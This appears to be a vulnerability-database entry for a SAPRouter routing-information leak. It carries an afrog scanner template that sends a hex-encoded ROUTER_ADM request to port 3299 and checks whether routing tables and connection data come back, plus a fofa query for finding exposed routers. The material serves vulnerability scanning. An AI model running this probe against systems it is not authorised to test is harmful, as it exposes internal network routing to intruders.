sap-router-info-leak: SAPRouter - Routing information leak

日期: 2025-09-01 | 影响软件: SAPRouter | POC: 已公开

漏洞描述

SAPRouter contains an information leakage vulnerability. fofa: protocol="sap-router"

PoC代码[已公开]

id: sap-router-info-leak

info:
  name: SAPRouter - Routing information leak
  author: randomstr1ng
  severity: critical
  description: |
    SAPRouter contains an information leakage vulnerability.
    fofa: protocol="sap-router"
  reference:
    - https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner
    - https://support.sap.com/en/tools/connectivity-tools/saprouter.html
  tags: network,sap
  created: 2022/03/21

set:
  hostname: request.url.host
  host: request.url.domain
rules:
  r0:
    request:
      type: tcp
      host: "{{hostname}}"
      data: "00000022524f555445525f41444d002802000000000000000000000000000000000000000000"
      data-type: hex
      read-size: 2048
    expression: response.raw.bcontains(b'Routtab') && response.raw.bcontains(b'Working directory') && response.raw.bcontains(b'SAProuter Connection Table')
  r1:
    request:
      type: tcp
      host: "{{host}}:3299"
      data: "00000022524f555445525f41444d002802000000000000000000000000000000000000000000"
      data-type: hex
      read-size: 2048
    expression: response.raw.bcontains(b'Routtab') && response.raw.bcontains(b'Working directory') && response.raw.bcontains(b'SAProuter Connection Table')
expression: r0() || r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/sap-router-info-leak.yaml